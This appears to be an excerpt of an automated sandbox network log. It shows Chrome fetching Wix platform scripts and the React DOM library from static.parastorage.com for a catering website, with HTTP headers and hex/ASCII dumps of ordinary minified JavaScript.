                                                                                                                                                                                                                        x-seen-by: VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLuuWLGLAwvTMYA8ArAuxUdh9UuJLvoOY0uBy3RuVN3og,rXUceJIlvIg2Ftogbhjv0DotuIfO6jrcs0g/pr/ByihEQfi00LSS7LJu7sdkoLsDW8yprm/o5peWPhCJ+IIlUQ==,r6yY0ta7bIKrqK70x072lUn1Hzrz6tRwKV4D+4rztCE=,bOnBQDOCjWxRPsoIciwTISbG/RL6EauY3M1puH9WK6TdcqQi0XusoXKDD9ofW4iZ+6tZTvqIBOgbopHbgsRqgg==
                                                                                                                                                                                                                        x-wix-request-id: 1736517159.303562078443052785255
                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        43192.168.2.54976334.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC625OUTGET /services/wix-thunderbolt/dist/router.478f8b95.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1303
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: dBKbad6dybnZMLw95870eCyKyUWt9Vrp
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 639591914 941554969
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 965699438
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:43:27 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 274152
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:35:11 GMT
                                                                                                                                                                                                                        ETag: "2a76b438980c3b70ff11f9c7903fb226"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 31 34 38 2c 35 36 35 32 2c 36 35 32 31 5d 2c 7b 31 39 30 32 35 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 6e 2e 64 28 65 2c 7b 4c 6d 3a 28 29 3d 3e 72 2c 4d 79 3a 28 29 3d 3e 77 2c 4f 67 3a 28 29 3d 3e 63 2c 51 4a 3a 28 29 3d 3e 68 2c 51 78 3a 28 29 3d 3e 76 2c 56 38 3a 28 29 3d 3e 5f 2c 5f 64 3a 28 29 3d 3e 6f 2c 61 6b 3a 28 29 3d 3e 61 2c 69 69 3a 28 29 3d 3e 69 2c 6c 44 3a
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5148,5652,6521],{19025:(t,e,n)=>{n.d(e,{Lm:()=>r,My:()=>w,Og:()=>c,QJ:()=>h,Qx:()=>v,V8:()=>_,_d:()=>o,ak:()=>a,ii:()=>i,lD:
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1075INData Raw: 28 29 3d 3e 73 2c 6c 48 3a 28 29 3d 3e 64 2c 72 45 3a 28 29 3d 3e 6d 2c 76 68 3a 28 29 3d 3e 75 7d 29 3b 63 6f 6e 73 74 20 73 3d 2f 6d 61 69 6c 74 6f 3a 28 5b 5e 3f 5d 2b 29 28 5c 3f 28 2e 2a 29 29 3f 2f 2c 72 3d 2f 5e 74 65 6c 3a 28 2e 2a 29 2f 2c 61 3d 2f 5e 5c 2f 28 5b 5e 20 3f 23 5d 2a 29 3f 5b 23 5d 3f 28 5b 5e 20 3f 23 5d 2a 29 5b 3f 5d 3f 28 2e 2a 29 2f 2c 70 3d 2f 5e 23 28 5b 5e 20 3f 5d 2a 29 5b 3f 5d 3f 28 2e 2a 29 2f 2c 6c 3d 2f 5e 28 68 74 74 70 7c 68 74 74 70 73 29 3a 5c 2f 5c 2f 28 2e 2a 29 2f 2c 6f 3d 2f 5e 77 69 78 3a 64 6f 63 75 6d 65 6e 74 3a 5c 2f 5c 2f 76 31 5c 2f 28 2e 2b 29 5c 2f 28 2e 2b 29 2f 2c 63 3d 2f 5e 64 6f 63 75 6d 65 6e 74 3a 5c 2f 5c 2f 28 2e 2a 29 2f 2c 69 3d 74 3d 3e 72 2e 74 65 73 74 28 74 29 2c 64 3d 74 3d 3e 74 2e 73
                                                                                                                                                                                                                        Data Ascii: ()=>s,lH:()=>d,rE:()=>m,vh:()=>u});const s=/mailto:([^?]+)(\?(.*))?/,r=/^tel:(.*)/,a=/^\/([^ ?#]*)?[#]?([^ ?#]*)[?]?(.*)/,p=/^#([^ ?]*)[?]?(.*)/,l=/^(http|https):\/\/(.*)/,o=/^wix:document:\/\/v1\/(.+)\/(.+)/,c=/^document:\/\/(.*)/,i=t=>r.test(t),d=t=>t.s


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        44192.168.2.54976934.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC400OUTGET /unpkg/react-dom@18.3.1/umd/react-dom.production.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1077INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 131835
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 121264530
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Access-Control-Max-Age: 3000
                                                                                                                                                                                                                        Date: Tue, 31 Dec 2024 21:35:52 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 836207
                                                                                                                                                                                                                        Last-Modified: Thu, 30 May 2024 06:53:10 GMT
                                                                                                                                                                                                                        ETag: "7d4842a904e5d5d1b19240075998b111"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC313INData Raw: 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2d 64 6f 6d 2e 70 72 6f 64 75 63 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 2f 2a
                                                                                                                                                                                                                        Data Ascii: /** * @license React * react-dom.production.min.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(function(){/*
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 51 2c 7a 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 7a 62 28 65 78 70 6f 72 74 73 2c 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 72 65 61 63 74 22 5d 2c 7a 62 29 3a 28 51 3d 51 7c 7c 73 65 6c 66 2c 7a 62 28 51 2e 52 65 61 63 74 44 4f 4d 3d 7b 7d 2c 51 2e 52 65 61 63 74 29 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 51 2c 7a 62 29 7b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22
                                                                                                                                                                                                                        Data Ascii: (function(Q,zb){"object"===typeof exports&&"undefined"!==typeof module?zb(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],zb):(Q=Q||self,zb(Q.ReactDOM={},Q.React))})(this,function(Q,zb){function m(a){for(var b="
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 65 3d 61 3b 74 68 69 73 2e 74 79 70 65 3d 62 3b 74 68 69 73 2e 73 61 6e 69 74 69 7a 65 55 52 4c 3d 66 3b 74 68 69 73 2e 72 65 6d 6f 76 65 45 6d 70 74 79 53 74 72 69 6e 67 3d 67 7d 66 75 6e 63 74 69 6f 6e 20 24 64 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 52 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 62 29 3f 52 5b 62 5d 3a 6e 75 6c 6c 3b 69 66 28 6e 75 6c 6c 21 3d 3d 65 3f 30 21 3d 3d 65 2e 74 79 70 65 3a 64 7c 7c 21 28 32 3c 62 2e 6c 65 6e 67 74 68 29 7c 7c 22 6f 22 21 3d 3d 0a 62 5b 30 5d 26 26 22 4f 22 21 3d 3d 62 5b 30 5d 7c 7c 22 6e 22 21 3d 3d 62 5b 31 5d 26 26 22 4e 22 21 3d 3d 62 5b 31 5d 29 65 6a 28 62 2c 63 2c 65 2c 64 29 26 26 28 63 3d 6e 75 6c 6c 29 2c 64 7c 7c 6e 75 6c 6c 3d 3d 3d 65 3f 62 6a 28 62 29 26 26 28 6e 75 6c 6c 3d 3d 3d
                                                                                                                                                                                                                        Data Ascii: e=a;this.type=b;this.sanitizeURL=f;this.removeEmptyString=g}function $d(a,b,c,d){var e=R.hasOwnProperty(b)?R[b]:null;if(null!==e?0!==e.type:d||!(2<b.length)||"o"!==b[0]&&"O"!==b[0]||"n"!==b[1]&&"N"!==b[1])ej(b,c,e,d)&&(c=null),d||null===e?bj(b)&&(null===
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 29 69 66 28 65 5b 67 5d 21 3d 3d 66 5b 68 5d 29 7b 69 66 28 31 21 3d 3d 67 7c 7c 31 21 3d 3d 68 29 7b 64 6f 20 69 66 28 67 2d 2d 2c 68 2d 2d 2c 30 3e 68 7c 7c 65 5b 67 5d 21 3d 3d 66 5b 68 5d 29 7b 76 61 72 20 6b 3d 22 5c 6e 22 2b 65 5b 67 5d 2e 72 65 70 6c 61 63 65 28 22 20 61 74 20 6e 65 77 20 22 2c 22 20 61 74 20 22 29 3b 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 26 26 6b 2e 69 6e 63 6c 75 64 65 73 28 22 3c 61 6e 6f 6e 79 6d 6f 75 73 3e 22 29 26 26 28 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 22 3c 61 6e 6f 6e 79 6d 6f 75 73 3e 22 2c 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 29 29 3b 72 65 74 75 72 6e 20 6b 7d 77 68 69 6c 65 28 31 3c 3d 67 26 26 30 3c 3d 68 29 7d 62 72 65 61 6b 7d 7d 7d 66 69 6e 61 6c 6c 79 7b 63 65 3d 21 31 2c 45 72 72 6f 72 2e 70 72 65 70 61 72
                                                                                                                                                                                                                        Data Ascii: )if(e[g]!==f[h]){if(1!==g||1!==h){do if(g--,h--,0>h||e[g]!==f[h]){var k="\n"+e[g].replace(" at new "," at ");a.displayName&&k.includes("<anonymous>")&&(k=k.replace("<anonymous>",a.displayName));return k}while(1<=g&&0<=h)}break}}}finally{ce=!1,Error.prepar
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 6e 28 62 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 22 43 6f 6e 74 65 78 74 22 29 2b 22 2e 43 6f 6e 73 75 6d 65 72 22 3b 63 61 73 65 20 31 30 3a 72 65 74 75 72 6e 28 62 2e 5f 63 6f 6e 74 65 78 74 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 22 43 6f 6e 74 65 78 74 22 29 2b 22 2e 50 72 6f 76 69 64 65 72 22 3b 63 61 73 65 20 31 38 3a 72 65 74 75 72 6e 22 44 65 68 79 64 72 61 74 65 64 46 72 61 67 6d 65 6e 74 22 3b 63 61 73 65 20 31 31 3a 72 65 74 75 72 6e 20 61 3d 62 2e 72 65 6e 64 65 72 2c 61 3d 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 61 2e 6e 61 6d 65 7c 7c 22 22 2c 62 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 28 22 22 21 3d 3d 61 3f 22 46 6f 72 77 61 72 64 52 65 66 28 22 2b 61 2b 22 29 22 3a 22 46 6f 72 77 61 72 64 52 65 66 22 29 3b 63 61 73 65 20 37 3a
                                                                                                                                                                                                                        Data Ascii: n(b.displayName||"Context")+".Consumer";case 10:return(b._context.displayName||"Context")+".Provider";case 18:return"DehydratedFragment";case 11:return a=b.render,a=a.displayName||a.name||"",b.displayName||(""!==a?"ForwardRef("+a+")":"ForwardRef");case 7:
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 74 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2c 73 65 74 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 64 3d 22 22 2b 61 7d 2c 73 74 6f 70 54 72 61 63 6b 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 5f 76 61 6c 75 65 54 72 61 63 6b 65 72 3d 0a 6e 75 6c 6c 3b 64 65 6c 65 74 65 20 61 5b 62 5d 7d 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 50 63 28 61 29 7b 61 2e 5f 76 61 6c 75 65 54 72 61 63 6b 65 72 7c 7c 28 61 2e 5f 76 61 6c 75 65 54 72 61 63 6b 65 72 3d 68 6a 28 61 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 67 28 61 29 7b 69 66 28 21 61 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 62 3d 61 2e 5f 76 61 6c 75 65 54 72 61 63 6b 65 72 3b 69 66 28 21 62 29 72 65 74 75 72 6e 21 30 3b 76 61 72 20 63 3d 62 2e 67 65 74 56 61 6c
                                                                                                                                                                                                                        Data Ascii: tValue:function(){return d},setValue:function(a){d=""+a},stopTracking:function(){a._valueTracker=null;delete a[b]}}}}function Pc(a){a._valueTracker||(a._valueTracker=hj(a))}function jg(a){if(!a)return!1;var b=a._valueTracker;if(!b)return!0;var c=b.getVal
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 74 43 68 65 63 6b 65 64 3d 21 21 62 2e 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 67 28 61 2c 62 2c 63 29 7b 69 66 28 62 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 76 61 6c 75 65 22 29 7c 7c 62 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 64 65 66 61 75 6c 74 56 61 6c 75 65 22 29 29 7b 76 61 72 20 64 3d 62 2e 74 79 70 65 3b 69 66 28 21 28 22 73 75 62 6d 69 74 22 21 3d 3d 64 26 26 22 72 65 73 65 74 22 21 3d 3d 64 7c 7c 76 6f 69 64 20 30 21 3d 3d 62 2e 76 61 6c 75 65 26 26 6e 75 6c 6c 21 3d 3d 62 2e 76 61 6c 75 65 29 29 72 65 74 75 72 6e 3b 62 3d 22 22 2b 61 2e 5f 77 72 61 70 70 65 72 53 74 61 74 65 2e 69 6e 69 74 69 61 6c 56 61 6c 75 65 3b 0a 63 7c 7c 62 3d 3d 3d 61 2e 76 61 6c 75 65 7c 7c 28 61 2e 76 61 6c
                                                                                                                                                                                                                        Data Ascii: tChecked=!!b.defaultChecked)}function mg(a,b,c){if(b.hasOwnProperty("value")||b.hasOwnProperty("defaultValue")){var d=b.type;if(!("submit"!==d&&"reset"!==d||void 0!==b.value&&null!==b.value))return;b=""+a._wrapperState.initialValue;c||b===a.value||(a.val
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 63 2c 63 21 3d 3d 61 2e 76 61 6c 75 65 26 26 28 61 2e 76 61 6c 75 65 3d 63 29 2c 6e 75 6c 6c 3d 3d 62 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 26 26 61 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 21 3d 3d 63 26 26 28 61 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3d 63 29 29 3b 6e 75 6c 6c 21 3d 64 26 26 28 61 2e 64 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 22 2b 64 29 7d 66 75 6e 63 74 69 6f 6e 20 70 67 28 61 2c 62 29 7b 62 3d 61 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3b 62 3d 3d 3d 61 2e 5f 77 72 61 70 70 65 72 53 74 61 74 65 2e 69 6e 69 74 69 61 6c 56 61 6c 75 65 26 26 22 22 21 3d 3d 62 26 26 6e 75 6c 6c 21 3d 3d 62 26 26 28 61 2e 76 61 6c 75 65 3d 62 29 7d 66 75 6e 63 74 69 6f 6e 20 71 67 28 61 29 7b 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 20 22 73 76 67 22 3a 72 65
                                                                                                                                                                                                                        Data Ascii: c,c!==a.value&&(a.value=c),null==b.defaultValue&&a.defaultValue!==c&&(a.defaultValue=c));null!=d&&(a.defaultValue=""+d)}function pg(a,b){b=a.textContent;b===a._wrapperState.initialValue&&""!==b&&null!==b&&(a.value=b)}function qg(a){switch(a){case "svg":re
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 61 63 65 2d 75 72 69 22 3a 63 61 73 65 20 22 66 6f 6e 74 2d 66 61 63 65 2d 66 6f 72 6d 61 74 22 3a 63 61 73 65 20 22 66 6f 6e 74 2d 66 61 63 65 2d 6e 61 6d 65 22 3a 63 61 73 65 20 22 6d 69 73 73 69 6e 67 2d 67 6c 79 70 68 22 3a 72 65 74 75 72 6e 21 31 3b 0a 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 21 30 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 65 28 61 29 7b 61 3d 61 2e 74 61 72 67 65 74 7c 7c 61 2e 73 72 63 45 6c 65 6d 65 6e 74 7c 7c 77 69 6e 64 6f 77 3b 61 2e 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 55 73 65 45 6c 65 6d 65 6e 74 26 26 28 61 3d 61 2e 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 55 73 65 45 6c 65 6d 65 6e 74 29 3b 72 65 74 75 72 6e 20 33 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 3f 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 61 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                                                                                        Data Ascii: ace-uri":case "font-face-format":case "font-face-name":case "missing-glyph":return!1;default:return!0}}function re(a){a=a.target||a.srcElement||window;a.correspondingUseElement&&(a=a.correspondingUseElement);return 3===a.nodeType?a.parentNode:a}function
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1390INData Raw: 20 6e 62 28 61 29 7b 76 61 72 20 62 3d 61 2c 63 3d 61 3b 69 66 28 61 2e 61 6c 74 65 72 6e 61 74 65 29 66 6f 72 28 3b 62 2e 72 65 74 75 72 6e 3b 29 62 3d 62 2e 72 65 74 75 72 6e 3b 65 6c 73 65 7b 61 3d 62 3b 64 6f 20 62 3d 61 2c 30 21 3d 3d 28 62 2e 66 6c 61 67 73 26 34 30 39 38 29 26 26 28 63 3d 62 2e 72 65 74 75 72 6e 29 2c 61 3d 62 2e 72 65 74 75 72 6e 3b 77 68 69 6c 65 28 61 29 7d 72 65 74 75 72 6e 20 33 3d 3d 3d 62 2e 74 61 67 3f 63 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 7a 67 28 61 29 7b 69 66 28 31 33 3d 3d 3d 61 2e 74 61 67 29 7b 76 61 72 20 62 3d 61 2e 6d 65 6d 6f 69 7a 65 64 53 74 61 74 65 3b 6e 75 6c 6c 3d 3d 3d 62 26 26 28 61 3d 61 2e 61 6c 74 65 72 6e 61 74 65 2c 0a 6e 75 6c 6c 21 3d 3d 61 26 26 28 62 3d 61 2e 6d 65 6d 6f 69 7a 65 64 53
                                                                                                                                                                                                                        Data Ascii: nb(a){var b=a,c=a;if(a.alternate)for(;b.return;)b=b.return;else{a=b;do b=a,0!==(b.flags&4098)&&(c=b.return),a=b.return;while(a)}return 3===b.tag?c:null}function zg(a){if(13===a.tag){var b=a.memoizedState;null===b&&(a=a.alternate,null!==a&&(b=a.memoizedS


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        45192.168.2.54977134.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC405OUTGET /services/wix-thunderbolt/dist/group_2.484922c1.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:39 UTC1165INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 49944
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: ZoF7_bweMyBuCl3J5n7bPomCjvtmE.oe
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 1008369445 220849395
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 1021883730
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 09:31:24 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 102075
